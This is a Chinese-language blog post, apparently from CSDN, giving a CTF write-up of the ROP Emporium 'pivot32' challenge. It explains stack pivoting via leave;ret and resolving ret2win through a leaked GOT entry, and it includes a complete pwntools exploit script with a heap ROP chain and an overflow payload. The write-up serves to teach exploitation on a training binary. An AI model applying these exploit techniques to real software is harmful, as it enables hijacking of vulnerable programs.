CTF-PWN-pivot32 (ROP+plt+GOT+栈帧转移)

最新推荐文章于 2022-03-27 10:56:43 发布
最新推荐文章于 2022-03-27 10:56:43 发布
阅读量915 收藏 2
点赞数 1
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/99882551
版权

程序概述

首先本程序是一个32位程序,checksec后观察发现只开启了NX。
由于题目中使用了libpivot.so动态链接库,并且重要的得到flag的函数也在libpivot.so函数中,因此考虑用plt和got的映射关系,然后根据函数在.so文件中的偏移来找到cat_flag函数的地址,从而栈溢出控制程序流程。

有一个小问题在于题目中给的栈溢出的缓冲区比较小,很显然无法存下我们所需要的所有ROP链。注意到程序要求我们输入两次,第一次的输入保存在一个空间比较大的堆中(malloc),所以可以考虑在堆中存入shellcode,在栈中用某种方法把eip导向堆中相应位置。

具体步骤

根据逆向分析,我们知道了可以泄露的函数 foothold_function() 。根据延时绑定技术,当我们在调用如 func@plt() 的时候,系统才会将真正的 func() 函数地址写入到GOT表的 func.got.plt 中,然后 func@plt()根据 func.got.plt 跳转到真正的 func() 函数上去。

至于如何将程序控制流导向对应的堆地址中,我们需要用到leave|ret指令。
leave指令可以拆解为如下步骤:

mov esp, ebp
pop ebp

因此该题的栈缓冲区我们应该这样布置:

---------------------------------
		buffer_padding
---------------------------------
			fake_ebp
---------------------------------
			leave_ret
---------------------------------

buffer_padding显然是为了填补缓冲区,造成栈溢出。
leave_ret指令拆解为mov esp, ebp; pop ebp; ret之后,可以看mov 操作是可以对栈的位置进行操控的。所以我们只需要把fake_ebp用malloc的地址减去4,这样经过pop ebp之后,ret的地址就刚好在我们在堆上布置的shellcode上了。

exp:

from pwn import *

p=process("./pivot32")
elf=ELF('./pivot32')
lib_elf=ELF('./libpivot32.so')

func_plt=elf.plt['foothold_function']
func_got_plt=elf.got['foothold_function']
foothold_sym=lib_elf.symbols['foothold_function']
ret2win_sym=lib_elf.symbols['ret2win']
offset=int(ret2win_sym-foothold_sym)

leave_ret=0x080486a8
mov_eax_eax=0x080488c4
pop_eax=0x080488c0
pop_ebx=0x08048571
add_eax_ebx=0x080488c7
call_eax=0x080486a3

p.recvuntil("The Old Gods kindly bestow upon you a place to pivot: ")
fake_ebp=int(p.recv(10),16)

payload1=p32(func_plt)
payload1+=p32(pop_eax)
payload1+=p32(func_got_plt)
payload1+=p32(mov_eax_eax)
payload1+=p32(pop_ebx)
payload1+=p32(offset)
payload1+=p32(add_eax_ebx)
payload1+=p32(call_eax)

p.recvuntil('> ')
p.sendline(payload1)

payload2='A'*40
payload2+=p32(fake_ebp-4)
payload2+=p32(leave_ret)

p.recvuntil('> ')
p.sendline(payload2)
p.interactive()
SuperGate
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF|rop emporium pivot32 writeup (栈迁移题型)
skyattractive的博客
06-13 663
CTF|rop emporium pivot32 writeup (栈迁移题型) 题目来源:https://ropemporium.com/challenge/pivot.html malloc生成了一个堆区 pwnme函数里面有两个gets函数,存在栈溢出的地方,在第二个gets,但是他在填充完s之后所剩下的空间位58-0x28-4,是一个很小的空间,在这样的狭小空间里面是不足以构造rop chain的。 stack pivoting 具有这样特点的题目叫做stack pivoting。 stack
piovt32 ROP Emporium
devil8123665的博客
03-30 477
1、栈迁移 由于某些条件限制先栈空间不足写长的ROP,需要把主要的ROP写到其他区域。在可写栈区域写一个短的ROP,完成跳转到长ROP区域,完成最终的代码执行。栈迁移有两种方法,方法一,通过两次 leave ret完成,方法二,通过控制栈顶寄存器esp,使其跳转到长ROP区域。 方法一: 汇编语言leave_ret指令 leave相当于mov esp ebp + pop ebp mov esp ebp操作指将ebp的值赋给esp,也就是让esp指向ebp所指的地方 pop ebp操作指将栈上ebp所指
pivot ROP Emporium
u014377094的博客
02-13 2661
打开ida,发现给了一块堆空间,并把地址告诉我们,看来是让我们利用栈空间了 打开.so文件 ,依旧有一个可以打开文件的函数 但是该函数的plt并没有出现,也就是说我们无法直接利用 这里有个函数给了提示,提示我们,利用function的.plt间接获得ret2win的地址 接下来我们尝试先运行一次function的plt,使got表更新,再把got表更新后的地址,内容放在堆上,再用栈偏移去跑到堆上。payload1是堆中的,payload2是栈中的。 0x00000000004006b
PLT/GOT表在ctf pwn题目中的理解与运用 结合CSAPPchap7
weixin_46521144的博客
04-01 1309
由于之前没学过CSAPP第七章的时候,做pwn题时许多概念比如PLT表,GOT表,.BSS段这些概念都不很清楚,按照学长的方法照猫画虎也算是能做出来。如今学习的时候是带着当时的问题学完了这一章。因此做一个小总结,主要是对本章和pwn中关联度较大的部分做一个说明。 网上讲到和GOThijack相关的题目时,大多是推荐阅读CSAPP和连接相关的章节。如果你翻到了这篇文章,那你也就不用再学习原著了 ????当然,如果像更深入的了解,还是推荐CSAPP的。因为毕竟不能面面俱到,并且或许也会有理解错的地方。 理解
ROP_Emporium_pivot
Starr
03-27 2184
文章目录1. pivot32信息收集黑盒测试反汇编思路Exp2. pivot反汇编调试分析Exp3. 参考文章 如果esp和ebp能够被控制,那么整个堆栈就可以被控制,甚至被转移。Stack pivoting就是一种栈迁移技术,可以用来绕过NX,或者溢出空间太小的情况。 1. pivot32 信息收集 $ file pivot32 pivot32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, in
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息... 使用场景: ... 其他说明: ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF+pwn+nc(windows)+链接靶机
最新发布
06-10
我们经常在打pwn的时候可能要用到我们的nc,一般我们要打开虚拟机,加入我们本机有一个nc就会方便很多
CTF32位/64位dlresolve最全总结(无地址泄露执行one_gadget)
panhewu9919的博客
09-05 1933
利用dl_resolve执行libc内任意gadget(不需泄露libc地址) 实验代码下载地址:https://github.com/bsauce/CTF/tree/master/dl_resolve_64 分析:0CTF的题目blackhole2,很简单的栈溢出,但是远程不允许回显,所以不能泄露libc_base,不能返回shell。程序本身所含有的gadget有限,所以能不能不泄露libc_...
rop emporium 2020】write4
^_^
02-06 446
这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道题的学习记录 因为网上都是比较早版本的题解,所以写了这篇博客,这道题与之前的版本的区别是没有system函数,但是有另外一个print_file函数来获取flag,所以本质上还是差不多的。 题目链接:https://ropemporium.com/challenge/split.html 备注:以下题目都是在ubuntu16.04下完成 32位 溢出点还是44… 看了下网上给的教程是利用system函数。但是好像网站更.
pwn -- pwnable.kr -- simple-login---学习stack pivot
YANG12345_6的博客
12-24 278
在看关于pwn的书时学到了 栈帧劫持stack pivot 利用这个例题练习一下。 基本思想: stack pivot利用到的gadget是在函数退出时需要的两条指令:leave(mov esp,ebp;pop ebp);ret;。这两条指令基本都会有。 可以利用这两条指令,通过栈溢出的方式,实现可以完全控制栈。 stack pivot实现的基本方法 (我的理解 通过栈溢出的方式将 我们之后要实现的完全可控的栈的地址写到EBP的地方 写入之后 ,程序第一次leave;ret;,将写入的地址赋给esp。
PWN got表跟plt
weixin_43225801的博客
12-03 1813
为了更好的用户体验和内存CPUCPU的利用率,程序编译时会采用两种表进行辅助,一个为PLTPLT表,一个为GOTGOT表,PLTPLT表可以称为内部函数表,GOTGOT表为全局函数表。 PLTPLT表中的每一项的数据内容都是对应的GOTGOT表中一项的地址这个是固定不变的,到这里大家也知道了PLTPLT表中的数据根本不是函数的真实地址,而是GOTGOT表项的地址。 ...
buuctf pwn wp(第五波)认识GOT表和PLT
月阴荒的博客
04-22 562
jarvisoj_level3 https://blog.csdn.net/qq_40148538/article/details/102021844 https://blog.csdn.net/weixin_41617275/article/details/84796987
CTF-PWN-callme32 [ROP+栈溢出]
SuperGate的博客
08-13 892
首先发现在pwnme函数中有一个明显的缓冲区溢出,长度为40,经调试发现填入44长度的垃圾信息即可填入shellcode ida发现一个重要函数如下: 点入后发现这三个函数为系统级调用。正好题目给了我们一个.so文件。进入查看,发现有这三个函数的反编译。依次是将加密后的flag通过key1,key2解密。调用顺序应该是callme_one -> callme_two -> c...
pwn——rop练习
sjt670994562的博客
09-17 583
hackme——ROP2 这道题用了一个比较新的方法,去寻找栈溢出的点,他用了syscall调用的相关函数,其中参数的第一位代表序号既调用的哪一个函数,我们称为syscall table调用号,这里4是write 3是read 这里我们用到了 locate unistd_32 这里有大佬的文章 https://blog.csdn.net/mydo/article/details/44997901...
小白详解rop emporium
BadRer的博客
08-02 2087
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
pwn学习
weixin_40597510的博客
01-24 1112
转自https://r00tk1ts.github.io/2017/09/11/PWN%E9%80%89%E6%89%8B%E7%9A%84%E8%87%AA%E6%88%91%E4%BF%AE%E5%85%BB/#%E6%A0%88%E6%BA%A2%E5%87%BA%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95 栈 特性:先进先出 内存的一片区间,栈型结构管理,...
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值